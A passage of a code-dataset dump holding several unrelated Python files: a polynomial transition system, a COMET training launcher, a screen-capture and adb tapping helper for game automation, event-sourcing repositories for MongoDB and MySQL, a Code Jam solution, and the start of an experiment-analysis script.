invariant, pre_condition=[]):\n if v not in self.vertices:\n raise Exception(\"Vertex {} does not exists.\".format(v))\n self.initial_loc = v\n self.invariants[v] = invariant\n self.pre_conditions[v] = pre_condition\n\n def set_final_loc(self, v, invariant, pre_condition=[]):\n if v not in self.vertices:\n raise Exception(\"Vertex {} does not exists.\".format(v))\n self.final_loc = v\n self.invariants[v] = invariant\n self.pre_conditions[v] = pre_condition\n\n def print(self):\n if not self.var_manager.args.print_verbose:\n return\n print(\"\\n===== Polynomial Transition System =====\")\n print(\"Initial Location: \", self.initial_loc)\n print(\"Final Location: \", self.final_loc)\n print(\"Vertices:\")\n for v in self.vertices:\n if v in self.invariants or v in self.pre_conditions:\n print(\"==== vertice %s ====\" % v)\n if v in self.invariants:\n print(\" === Invariant: \", self.invariants[v])\n if v in self.pre_conditions:\n print(\" === Other Pre-Conditions: \",\n self.pre_conditions[v])\n print()\n # print(\"Edges: \")\n # for e in self.edges:\n # \tprint(e, self.edges[e])\n\n def plot(self):\n import networkx as nx\n import matplotlib.pyplot as plt\n edges = self.edges.keys()\n G = nx.Graph()\n G.add_edges_from(edges)\n pos = nx.spring_layout(G)\n plt.figure()\n nx.draw(\n G, pos, edge_color='black', width=1, linewidths=2,\n node_size=500, node_color='pink', alpha=0.9,\n labels={node: node for node in G.nodes()}\n )\n edge_labels = dict()\n for edge in self.edges:\n edge_labels[edge] = self.edges[edge][2][:10] # the text\n nx.draw_networkx_edge_labels(\n G, pos,\n edge_labels=edge_labels,\n font_color='red',\n font_size='8'\n )\n # get positions\n pos = nx.spring_layout(G)\n # shift position a little bit\n shift = [0, 0]\n shifted_pos = {node: node_pos +\n shift for node, node_pos in pos.items()}\n # Just some text to print in addition to node ids\n labels = {}\n for v in self.vertex_text:\n labels[v] = self.vertex_text[v]\n\n # nx.draw_networkx_labels(G, shifted_pos, labels=labels, horizontalalignment=\"left\", font_size='8')\n\n plt.axis('off')\n plt.savefig(self.file_name + \"_graph.pdf\", block=True)\n\n def get_constraint_pairs(self):\n CP = []\n for v in self.cutset:\n CP.extend(self.get_constraint_pairs_for_paths_between(\n self.initial_loc, v))\n CP.extend(self.get_constraint_pairs_for_paths_between(\n v, self.final_loc))\n\n for v1 in self.cutset:\n for v2 in self.cutset:\n CP.extend(self.get_constraint_pairs_for_paths_between(v1, v2))\n\n # search for path directly from initial to final location\n CP.extend(self.get_constraint_pairs_for_paths_between(\n self.initial_loc, self.final_loc))\n\n return CP\n\n def get_constraint_pairs_for_paths_between(self, v1, v2):\n \"\"\"\n Returns: A list of constraint pairs for each path between v1 and v2\n \"\"\"\n lst = []\n paths = self.get_paths_between(v1, v2)\n if self.var_manager.args.print_verbose:\n print(\"\\n======== Path of [%d]=>[%d] = %d\" % (v1, v2, len(paths)))\n for i, path in enumerate(paths):\n if self.var_manager.args.print_verbose:\n print(\"\\n##### Path: [%d]=>[%d], %d/%d\" %\n (v1, v2, i, len(paths)))\n variables_index = {x: 0 for x in self.variables}\n alpha, beta, real_vars = [], [], copy.copy(self.variables)\n substitute_dict = get_substition_dict(real_vars, variables_index)\n final_values_of_vars = {x: Polynomial(\n {substitute_dict[x]: 1}) for x in self.variables}\n alpha += apply_substitute(self.invariants[v1],\n final_values_of_vars)\n alpha += apply_substitute(\n self.pre_conditions[v1], final_values_of_vars)\n old_vertex = v1\n\n for vert in path[1:]:\n new_vertex = vert\n update, guard, text = self.edges[(old_vertex, new_vertex)]\n guard_subs = apply_substitute(guard, final_values_of_vars)\n alpha.extend(guard_subs)\n if update:\n (var, poly) = update\n poly_subs = poly.subs_complex(final_values_of_vars)\n final_values_of_vars[str(var)] = poly_subs\n old_vertex = new_vertex\n if self.var_manager.args.print_verbose:\n print(\"\\n\\tTransitions:\\n\\t\")\n for k, v in final_values_of_vars.items():\n if len(v.monomial_dict.keys()) == 1:\n term = list(v.monomial_dict.keys())[0]\n\n if k in str(term) and v.monomial_dict[term] == 1:\n continue\n if self.var_manager.args.print_verbose:\n print('\\t\\t ', k, '=', v.to_string())\n\n if self.var_manager.args.print_verbose:\n print(\"\\n\\tPre-Guards:\\n\\t\\t\",\n alpha[len(self.invariants[v1]):])\n beta += apply_substitute(self.invariants[v2], final_values_of_vars)\n lst.append((alpha, beta, real_vars))\n return lst\n\n def get_paths_between_backtrack(self, v1, v2):\n solutions = []\n current_solution = []\n candidate_vertices = deque()\n candidate_vertices.append((1, v1))\n while len(candidate_vertices) >= 1:\n depth, curr_v = candidate_vertices.pop()\n if len(current_solution) >= depth:\n current_solution = current_solution[:depth-1] + [curr_v]\n else:\n current_solution.append(curr_v)\n\n if curr_v is None:\n # not a solution\n current_solution.pop()\n elif curr_v == v2 and depth > 1:\n # a solution is found\n solutions.append(copy.deepcopy(current_solution))\n current_solution.pop()\n elif depth > 1 and curr_v in self.cutset:\n # not a solution\n current_solution.pop()\n else:\n # expand the node\n for next_v in self.get_neighbors(curr_v):\n candidate_vertices.append((depth+1, next_v))\n #print('path_of %s => %s = ' % (v1, v2), solutions)\n return solutions\n\n def get_paths_between(self, v1, v2, visited=None):\n # assume no self loop, i.e., every while block has at least one statement\n return self.get_paths_between_backtrack(v1, v2)\n\n def get_neighbors(self, v):\n n = []\n for _v in self.vertices:\n if (v, _v) in self.edges:\n n.append(_v)\n return n\n", "repo_name": "zhuocai/Asparagus", "sub_path": "src/PolynomialTS.py", "file_name": "PolynomialTS.py", "file_ext": "py", "file_size_in_byte": 13724, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sympy.Symbol", "line_number": 53, "usage_type": "call"}, {"api_name": "polynomial.Polynomial", "line_number": 59, "usage_type": "call"}, {"api_name": "polynomial.to_string", "line_number": 60, "usage_type": "call"}, {"api_name": "polynomial.Polynomial", "line_number": 68, "usage_type": "call"}, {"api_name": "polynomial.Polynomial", "line_number": 75, "usage_type": "call"}, {"api_name": "polynomial.Polynomial", "line_number": 76, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 86, "usage_type": "call"}, {"api_name": "polynomial.Polynomial", "line_number": 93, "usage_type": "call"}, {"api_name": "polynomial.Polynomial", "line_number": 114, "usage_type": "call"}, {"api_name": "networkx.Graph", "line_number": 220, "usage_type": "call"}, {"api_name": "networkx.spring_layout", "line_number": 222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "networkx.draw", "line_number": 224, "usage_type": "call"}, {"api_name": "networkx.draw_networkx_edge_labels", "line_number": 232, "usage_type": "call"}, {"api_name": "networkx.spring_layout", "line_number": 239, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 251, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 251, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 252, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 252, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 285, "usage_type": "call"}, {"api_name": "polynomial.Polynomial", "line_number": 287, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 326, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 340, "usage_type": "call"}]} +{"seq_id": "37105993467", "text": "import sys\nimport os\nimport argparse\n\nsys.path.append(os.getcwd())\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--experiment_type\", type=str, default='atomic',\n choices=[\"atomic\", \"conceptnet\"])\nparser.add_argument(\"--experiment_num\", type=str, default=\"0\")\nparser.add_argument(\"--pickled_data\", type=str, default=None)\nparser.add_argument(\"--save_path\", type=str, default=None, help='save path override')\nparser.add_argument(\"--train_comet_loss\", action='store_true', default=False, help='train with comet loss')\nparser.add_argument(\"--eval_comet_loss\", action='store_true', default=False, help='eval with comet loss')\n\nargs = parser.parse_args()\n\nif args.experiment_type == \"atomic\":\n from main_atomic import main\n main(args.experiment_num, args)\nif args.experiment_type == \"conceptnet\":\n from main_conceptnet import main\n main(args.experiment_num)\n", "repo_name": "mnskim/teamproject", "sub_path": "src/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 894, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.append", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 5, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 7, "usage_type": "call"}, {"api_name": "main_atomic.main", "line_number": 20, "usage_type": "call"}, {"api_name": "main_conceptnet.main", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "2344134779", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 17 23:12:21 2019\n\n@author: YY\n\"\"\"\n\nimport win32gui\nimport win32ui\nimport win32con\nfrom ctypes import windll\nfrom PIL import Image\nimport os,radd\nimport cv2\nimport numpy as np\n\ndef screencap(name):\n hwnd=win32gui.FindWindow(None,name + ' (仅限非商业用途)')\n# print(hwnd)\n# hwndChildList = [] \n# win32gui.EnumChildWindows(hwnd, lambda hwnd, param: param.append(hwnd), hwndChildList) \n# print(hwndChildList)\n# hwnd=hwndChildList[0]\n# print(hwnd)\n # 获取窗口位置\n left, top, right, bot = win32gui.GetWindowRect(hwnd)\n #获取某个句柄的类名和标题\n \n #print(left,top,right,bot)\n #window_capture(handle,'test.jpg')\n w = right - left\n h = bot - top\n \n # 返回句柄窗口的设备环境、覆盖整个窗口,包括非客户区,标题栏,菜单,边框\n hwndDC = win32gui.GetWindowDC(hwnd)\n \n # 创建设备描述表\n mfcDC = win32ui.CreateDCFromHandle(hwndDC)\n \n # 创建内存设备描述表\n saveDC = mfcDC.CreateCompatibleDC()\n \n # 创建位图对象\n saveBitMap = win32ui.CreateBitmap()\n saveBitMap.CreateCompatibleBitmap(mfcDC, w, h)\n saveDC.SelectObject(saveBitMap)\n \n # 截图至内存设备描述表\n img_dc = mfcDC\n mem_dc = saveDC\n mem_dc.BitBlt((0, 0), (w, h), img_dc, (0, 0), win32con.SRCCOPY)\n # 将截图保存到文件中\n# saveBitMap.SaveBitmapFile(mem_dc, 'screenshot.bmp')\n \n # 改变下行决定是否截图整个窗口,可以自己测试下\n result = windll.user32.PrintWindow(hwnd, saveDC.GetSafeHdc(), 1)\n# result = windll.user32.PrintWindow(hwnd, saveDC.GetSafeHdc(), 0)\n# print(result)\n \n # 获取位图信息\n bmpinfo = saveBitMap.GetInfo()\n bmpstr = saveBitMap.GetBitmapBits(True)\n # 生成图像\n im = Image.frombuffer(\n 'RGB',\n (bmpinfo['bmWidth'], bmpinfo['bmHeight']),\n bmpstr, 'raw', 'BGRX', 0, 1)\n \n # 内存释放\n win32gui.DeleteObject(saveBitMap.GetHandle())\n saveDC.DeleteDC()\n mfcDC.DeleteDC()\n win32gui.ReleaseDC(hwnd, hwndDC)\n \n # 存储截图\n if result == 1:\n #PrintWindow Succeeded\n im.save(\"test.png\")\n # im.show()\n \ndef open_pic_grey(Target):\n template = cv2.imread(Target,0)\n return template\n\ndef get_position(image,Target,value):\n img_rgb = cv2.imread(image)\n img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)\n w, h = Target.shape[::-1]\n res = cv2.matchTemplate(img_gray,Target,cv2.TM_CCOEFF_NORMED)\n threshold = value\n loc = np.where( res >= threshold)\n xy_loc = list(zip(*loc[::-1]))\n center_loc = []\n for i in xy_loc:\n center_loc.append((i[0]+int(w/2),i[1]+int(h/2)))\n return center_loc\n\ndef get_pic(pic_name):\n os.system('adb shell screencap -p /sdcard/'+pic_name+'.png')\n os.system('adb pull /sdcard/'+pic_name+'.png')\n \ndef swipee(x1,y1,x2,y2):\n os.system('adb shell input swipe '+str(x1)+' '+str(y1)+' '+str(x2)+' '+str(y2))\n\ndef point_biase(x,y,biase=5):\n return radd.get_point(x-biase,y-biase,x+biase,y+biase)\n\ndef swipe_biase(x1,y1,x2,y2,biase=5):\n x3,y3 = point_biase(x1,y1)\n x4,y4 = point_biase(x2,y2)\n swipee(x3,y3,x4,y4)\n \ndef tapp(x1,y1):\n os.system('adb shell input tap '+str(x1)+' '+str(y1))\n \ndef sw_or_tap(x1,y1,x2,y2):\n x3,y3=radd.get_point(x1,y1,x2,y2)\n x4,y4=radd.get_point(x1,y1,x2,y2)\n if radd.get_o_l()==1:\n swipee(x3,y3,x4,y4)\n else:\n tapp(x3,y3)\n \ndef random_tap(x1,y1,x2,y2):\n x3,y3=radd.get_point(x1,y1,x2,y2)\n tapp(x3,y3)\n \ndef tap_biase(loc,biase):\n x,y = loc\n random_tap(x-biase,y-biase,x+biase,y+biase)", "repo_name": "fibonacciyys/mypy", "sub_path": "autogamee/yysroyal/screenn.py", "file_name": "screenn.py", "file_ext": "py", "file_size_in_byte": 3708, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "win32gui.FindWindow", "line_number": 18, "usage_type": "call"}, {"api_name": "win32gui.GetWindowRect", "line_number": 26, "usage_type": "call"}, {"api_name": "win32gui.GetWindowDC", "line_number": 35, "usage_type": "call"}, {"api_name": "win32ui.CreateDCFromHandle", "line_number": 38, "usage_type": "call"}, {"api_name": "win32ui.CreateBitmap", "line_number": 44, "usage_type": "call"}, {"api_name": "win32con.SRCCOPY", "line_number": 51, "usage_type": "attribute"}, {"api_name": "ctypes.windll.user32.PrintWindow", "line_number": 56, "usage_type": "call"}, {"api_name": "ctypes.windll.user32", "line_number": 56, "usage_type": "attribute"}, {"api_name": "ctypes.windll", "line_number": 56, "usage_type": "name"}, {"api_name": "PIL.Image.frombuffer", "line_number": 64, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 64, "usage_type": "name"}, {"api_name": "win32gui.DeleteObject", "line_number": 70, "usage_type": "call"}, {"api_name": "win32gui.ReleaseDC", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 86, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 87, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 87, "usage_type": "attribute"}, {"api_name": "cv2.matchTemplate", "line_number": 89, "usage_type": "call"}, {"api_name": "cv2.TM_CCOEFF_NORMED", "line_number": 89, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 91, "usage_type": "call"}, {"api_name": "os.system", "line_number": 99, "usage_type": "call"}, {"api_name": "os.system", "line_number": 100, "usage_type": "call"}, {"api_name": "os.system", "line_number": 103, "usage_type": "call"}, {"api_name": "radd.get_point", "line_number": 106, "usage_type": "call"}, {"api_name": "os.system", "line_number": 114, "usage_type": "call"}, {"api_name": "radd.get_point", "line_number": 117, "usage_type": "call"}, {"api_name": "radd.get_point", "line_number": 118, "usage_type": "call"}, {"api_name": "radd.get_o_l", "line_number": 119, "usage_type": "call"}, {"api_name": "radd.get_point", "line_number": 125, "usage_type": "call"}]} +{"seq_id": "3811236566", "text": "import abc\nfrom collections import Iterable\nfrom copy import deepcopy\nfrom .DomainEventListener import DomainEventListener, ApplicationDomainEventPublisher\nfrom .DomainObject import DomainObject\nfrom pymongo import MongoClient\nimport pymysql.cursors\nimport json\n\n\nclass Repository(metaclass=abc.ABCMeta):\n @abc.abstractmethod\n def load(self, object_id):\n raise NotImplementedError()\n\n @abc.abstractmethod\n def exists(self, object_id):\n raise NotImplementedError()\n\n @abc.abstractmethod\n def save(self, obj):\n raise NotImplementedError()\n\n @abc.abstractmethod\n def get_event_stream_for(self, object_id):\n raise NotImplementedError()\n\n @abc.abstractmethod\n def max_version_for_object(self, object_id):\n raise NotImplementedError()\n\n @abc.abstractmethod\n def create_blank_domain_object(self):\n raise NotImplementedError()\n\n\nclass EventPublisherRepository(Repository, metaclass=abc.ABCMeta):\n def __init__(self):\n self.listeners = list()\n self.register_listener(ApplicationDomainEventPublisher().instance)\n\n def save(self, obj):\n to_emit = self.append_to_stream(obj)\n\n assert to_emit is not None\n assert isinstance(to_emit, Iterable)\n\n for event in to_emit:\n for listener in self.listeners:\n assert isinstance(listener, DomainEventListener)\n listener.domainEventPublished(event)\n\n def register_listener(self, listener):\n assert listener is not None\n assert isinstance(listener, DomainEventListener)\n\n if listener not in self.listeners:\n self.listeners.append(listener)\n\n @abc.abstractmethod\n def append_to_stream(self, obj):\n raise NotImplementedError()\n\n\nclass MongoEventSourceRepository(EventPublisherRepository, metaclass=abc.ABCMeta):\n def __init__(\n self, host=\"localhost\", port=27017, database=\"fenrys\", collection=\"event_store\"\n ):\n super().__init__()\n self.__client = MongoClient(host, port)\n self.__db = self.__client[database]\n self.__collection = self.__db[collection]\n\n def append_to_stream(self, obj):\n assert obj is not None\n assert isinstance(obj, DomainObject)\n\n max_known_version = self.max_version_for_object(obj.object_id)\n\n events_to_add = list()\n if obj.version_number > max_known_version:\n for event in obj.event_stream:\n if event[\"version\"] > max_known_version:\n events_to_add.append(deepcopy(event))\n\n if len(events_to_add) > 0:\n self.__collection.insert_many(events_to_add)\n\n return deepcopy(events_to_add)\n\n def load(self, object_id):\n obj = self.create_blank_domain_object()\n assert isinstance(obj, DomainObject)\n\n stream = self.get_event_stream_for(object_id)\n obj.rehydrate(stream)\n\n return obj\n\n def exists(self, object_id):\n return len(self.get_event_stream_for(object_id)) > 0\n\n def get_event_stream_for(self, object_id):\n stream = list()\n\n objects = self.__collection.find({\"object_id\": object_id})\n for event in objects:\n event.pop(\"_id\")\n stream.append(event)\n\n return stream\n\n def max_version_for_object(self, object_id):\n max_known_version = 0\n stream = self.get_event_stream_for(object_id)\n\n for event in stream:\n if event[\"version\"] > max_known_version:\n max_known_version = event[\"version\"]\n\n return max_known_version\n\n\nclass MySQLSourceRepository(EventPublisherRepository, metaclass=abc.ABCMeta):\n\n __CREATE_STREAM = \"\"\"create table `{}`(`object_id` varchar(255) not null, `version` int not null, `event_name` varchar(255) not null, `event` longtext not null, `event_timestamp` double not null, primary key(`object_id`, `version`))\"\"\"\n __SELECT_OBJECT_STREAM = \"select * from `{}` where object_id = %s\"\n __INSERT_OBJECT_STREAM = \"insert into `{}`(`object_id`, `version`, `event_name`, `event`, `event_timestamp`) values(%s, %s, %s, %s, %s)\"\n __CHECK_TABLE_EXISTS = \"show tables like %s\"\n __TABLE_EXISTS = False\n\n def __init__(\n self,\n user=\"fenrys\",\n password=\"fenrys\",\n host=\"localhost\",\n database=\"fenrys\",\n table=\"event_store\",\n ):\n super().__init__()\n self.__connection = pymysql.connect(\n host=host,\n user=user,\n password=password,\n db=database,\n charset=\"utf8mb4\",\n cursorclass=pymysql.cursors.DictCursor,\n )\n self.__table = table\n\n self.__create_table()\n\n def __del__(self):\n self.__connection.close()\n\n def __create_table(self):\n if not self.__table_exists():\n try:\n with self.__connection.cursor() as cursor:\n cursor.execute(\n MySQLSourceRepository.__CREATE_STREAM.format(self.__table)\n )\n self.__connection.commit()\n except Exception as e:\n self.__connection.rollback()\n raise e\n\n def __table_exists(self):\n if not MySQLSourceRepository.__TABLE_EXISTS:\n with self.__connection.cursor() as cursor:\n cursor.execute(\n MySQLSourceRepository.__CHECK_TABLE_EXISTS, (self.__table)\n )\n result = cursor.fetchone()\n if result:\n MySQLSourceRepository.__TABLE_EXISTS = True\n return True\n else:\n return False\n else:\n return True\n\n def append_to_stream(self, obj):\n assert obj is not None\n assert isinstance(obj, DomainObject)\n\n max_known_version = self.max_version_for_object(obj.object_id)\n\n events_to_add = list()\n if obj.version_number > max_known_version:\n for event in obj.event_stream:\n if event[\"version\"] > max_known_version:\n events_to_add.append(deepcopy(event))\n\n if len(events_to_add) > 0:\n try:\n with self.__connection.cursor() as cursor:\n cursor.executemany(\n MySQLSourceRepository.__INSERT_OBJECT_STREAM.format(\n self.__table\n ),\n map(\n lambda event: (\n event[\"object_id\"],\n int(event[\"version\"]),\n event[\"event_name\"],\n json.dumps(event[\"event\"]),\n \"{:10.15f}\".format(float(event[\"event_timestamp\"])),\n ),\n events_to_add,\n ),\n )\n self.__connection.commit()\n except Exception as e:\n self.__connection.rollback()\n raise e\n\n return deepcopy(events_to_add)\n\n def load(self, object_id):\n obj = self.create_blank_domain_object()\n assert isinstance(obj, DomainObject)\n\n stream = self.get_event_stream_for(object_id)\n obj.rehydrate(stream)\n\n return obj\n\n def exists(self, object_id):\n return len(self.get_event_stream_for(object_id)) > 0\n\n def get_event_stream_for(self, object_id):\n stream = list()\n\n with self.__connection.cursor() as cursor:\n cursor.execute(\n MySQLSourceRepository.__SELECT_OBJECT_STREAM.format(self.__table),\n (object_id),\n )\n results = cursor.fetchall()\n for result in results:\n r = dict()\n r[\"object_id\"] = result[\"object_id\"]\n r[\"version\"] = int(result[\"version\"])\n r[\"event_name\"] = result[\"event_name\"]\n r[\"event\"] = json.loads(result[\"event\"])\n r[\"event_timestamp\"] = float(result[\"event_timestamp\"])\n stream.append(r)\n\n return stream\n\n def max_version_for_object(self, object_id):\n stream = self.get_event_stream_for(object_id)\n\n return max(map(lambda x: x[\"version\"], stream)) if len(stream) > 0 else 0\n\n\nclass InMemoryEventSourceRepository(EventPublisherRepository, metaclass=abc.ABCMeta):\n def __init__(self):\n super().__init__()\n self.__repo = list()\n\n def append_to_stream(self, obj):\n assert obj is not None\n assert isinstance(obj, DomainObject)\n\n max_known_version = self.max_version_for_object(obj.object_id)\n\n events_to_add = list()\n if obj.version_number > max_known_version:\n for event in obj.event_stream:\n if event[\"version\"] > max_known_version:\n events_to_add.append(event)\n self.__repo.append(event)\n\n return deepcopy(events_to_add)\n\n def load(self, object_id):\n obj = self.create_blank_domain_object()\n assert isinstance(obj, DomainObject)\n\n stream = self.get_event_stream_for(object_id)\n obj.rehydrate(stream)\n\n return obj\n\n def exists(self, object_id):\n return len(self.get_event_stream_for(object_id)) > 0\n\n def get_event_stream_for(self, object_id):\n stream = list()\n for event in self.__repo:\n if event[\"object_id\"] == object_id:\n stream.append(event)\n return stream\n\n def max_version_for_object(self, object_id):\n max_known_version = 0\n stream = self.get_event_stream_for(object_id)\n\n for event in stream:\n if event[\"version\"] > max_known_version:\n max_known_version = event[\"version\"]\n\n return max_known_version\n", "repo_name": "FenrysIO/pythonddd", "sub_path": "eventsourcing/EventSourceRepository.py", "file_name": "EventSourceRepository.py", "file_ext": "py", "file_size_in_byte": 9866, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "abc.ABCMeta", "line_number": 11, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 12, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 16, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 20, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 24, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 28, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 32, "usage_type": "attribute"}, {"api_name": "abc.ABCMeta", "line_number": 37, "usage_type": "attribute"}, {"api_name": "DomainEventListener.ApplicationDomainEventPublisher", "line_number": 40, "usage_type": "call"}, {"api_name": "collections.Iterable", "line_number": 46, "usage_type": "argument"}, {"api_name": "DomainEventListener.DomainEventListener", "line_number": 50, "usage_type": "argument"}, {"api_name": "DomainEventListener.DomainEventListener", "line_number": 55, "usage_type": "argument"}, {"api_name": "abc.abstractmethod", "line_number": 60, "usage_type": "attribute"}, {"api_name": "abc.ABCMeta", "line_number": 65, "usage_type": "attribute"}, {"api_name": "pymongo.MongoClient", "line_number": 70, "usage_type": "call"}, {"api_name": "DomainObject.DomainObject", "line_number": 76, "usage_type": "argument"}, {"api_name": "copy.deepcopy", "line_number": 84, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 89, "usage_type": "call"}, {"api_name": "DomainObject.DomainObject", "line_number": 93, "usage_type": "argument"}, {"api_name": "abc.ABCMeta", "line_number": 124, "usage_type": "attribute"}, {"api_name": "pymysql.cursors.connect", "line_number": 141, "usage_type": "call"}, {"api_name": "pymysql.cursors", "line_number": 141, "usage_type": "name"}, {"api_name": "pymysql.cursors.cursors", "line_number": 147, "usage_type": "attribute"}, {"api_name": "pymysql.cursors", "line_number": 147, "usage_type": "name"}, {"api_name": "DomainObject.DomainObject", "line_number": 185, "usage_type": "argument"}, {"api_name": "copy.deepcopy", "line_number": 193, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 207, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 218, "usage_type": "call"}, {"api_name": "DomainObject.DomainObject", "line_number": 222, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 246, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 258, "usage_type": "attribute"}, {"api_name": "DomainObject.DomainObject", "line_number": 265, "usage_type": "argument"}, {"api_name": "copy.deepcopy", "line_number": 276, "usage_type": "call"}, {"api_name": "DomainObject.DomainObject", "line_number": 280, "usage_type": "argument"}]} +{"seq_id": "23392744681", "text": "import linecache\nimport math\n\ndef is_palindrome(num):\n if str(num) == str(num)[::-1]:\n return True\n return False\n\ndef is_square(num):\n sqroot = math.sqrt(num)\n if sqroot == int(sqroot):\n return int(sqroot)\n return False\n\ncases = 100\nlines = 100\nfilename = 'small.in'\n\ncase = 1\nline = 1\nwhile case <= cases and line <= lines:\n interval = linecache.getline(filename, line).split()\n start = int(interval[0])\n end = int(interval[1])\n \n fair_and_square = 0\n for num in range(start, end+1):\n if is_palindrome(num):\n #print('{}: Is palindrome'.format(num))\n sqroot = is_square(num)\n if sqroot:\n #print('{}: Is square root'.format(num))\n if is_palindrome(sqroot):\n fair_and_square += 1\n #print('{}: Square root is palindrome'.format(num))\n \n print('Case #{}: {}'.format(case, fair_and_square))\n case = case + 1\n line = line + 1\n\n\n\n\n\n", "repo_name": "dr-dos-ok/Code_Jam_Webscraper", "sub_path": "solutions_python/Problem_118/1778.py", "file_name": "1778.py", "file_ext": "py", "file_size_in_byte": 989, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "math.sqrt", "line_number": 10, "usage_type": "call"}, {"api_name": "linecache.getline", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "6101696247", "text": "# ------------------------------------------------------------------------------ #\n# @Author: F. Paul Spitzner\n# @Email: paul.spitzner@ds.mpg.de\n# @Created: 2021-10-25 17:28:21\n# @Last Modified: 2023-05-15 20:12:15\n# ------------------------------------------------------------------------------ #\n# Analysis script that preprocesses experiments and creates dataframes to compare\n# across condtions. Plots and more detailed analysis are in `paper_plots.py`\n# * input files are globbed from the provided input directory using a\n# hardcoded wildcard, depending on the type, e.g. `-t sim`, `-t exp`.\n# * output file names are given automatically, `-o` specifies the output directory.\n# ------------------------------------------------------------------------------ #\n\nimport os\nimport glob\nimport argparse\nimport logging\nimport warnings\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport datetime\n\n# import enlighten\nfrom tqdm.auto import tqdm\nfrom tqdm.contrib.logging import logging_redirect_tqdm\n\nlogging.basicConfig(\n format=\"%(asctime)s | %(levelname)-8s | %(name)-12s | %(message)s\",\n datefmt=\"%y-%m-%d %H:%M\",\n)\nlog = logging.getLogger(__name__)\nlog.setLevel(\"INFO\")\nwarnings.filterwarnings(\"ignore\") # suppress numpy warnings\n\n# our custom modules\nimport bitsandbobs as bnb\nimport ana_helper as ah\nimport plot_helper as ph\n\n# only affects simulations, as in the experiments we have only few neurons\n# per module, thus the 20% of neurons in the module are just one neuron.\nremove_null_sequences = False\n\n# whether to store the analysis of each trial as hdf5 in the usual format\nsave_analysed_h5f = False\n\n# for correlation coefficients, size of time steps in which number of spikes are counted\ntime_bin_size_for_rij = 500 / 1000 # in seconds\n\n# threshold for burst detection [% of max peak height]\n# we found that simulations needed different parameters due to the higher (sampled)\n# number of neurons and time resolution\ndef threshold_factor(etype):\n if etype[0:3] == \"exp\":\n return 10 / 100\n elif etype[0:3] == \"sim\":\n return 2.5 / 100\n else:\n raise ValueError(f\"etype {etype} not recognized\")\n\n\n# for pop. rate, width of gaussian placed on every spike, in seconds\ndef bs_large(etype):\n if etype[0:3] == \"exp\":\n return 200 / 1000\n elif etype[0:3] == \"sim\":\n return 20 / 1000\n else:\n raise ValueError(f\"etype {etype} not recognized\")\n\n\ndataframes = None\n\n\ndef main():\n global dataframes\n global h5f\n parser = argparse.ArgumentParser(description=\"Process conditions\")\n parser.add_argument(\n \"-t\",\n dest=\"etype\",\n required=True,\n help=(\n \"'exp', 'exp_chemical', 'exp_bic', 'sim', 'sim_partial',\"\n \" 'sim_partial_no_inhib'\"\n ),\n )\n parser.add_argument(\n \"-i\",\n dest=\"input_base\",\n required=True,\n help=\"Root directory for files, `./dat/exp_in/`\",\n )\n parser.add_argument(\n \"-o\",\n dest=\"output_path\",\n required=True,\n help=\"`./dat/exp_out/`\",\n )\n args = parser.parse_args()\n\n output_path = args.output_path\n\n conditions = dict()\n if args.etype == \"exp\":\n for layout in [\"1b\", \"3b\", \"merged\"]:\n conditions[layout] = [\"1_pre\", \"2_stim\", \"3_post\"]\n elif args.etype == \"exp_chemical\":\n conditions[\"KCl_1b\"] = [\"1_KCl_0mM\", \"2_KCl_2mM\"]\n elif args.etype == \"exp_bic\":\n conditions[\"Bicuculline_1b\"] = [\"1_spon_Bic_20uM\", \"2_stim_Bic_20uM\"]\n elif args.etype == \"exp_mod_comp\":\n # comparison between different targeted regions\n conditions[\"partial_s\"] = [\"1_pre\", \"2_stim2\", \"3_post\", 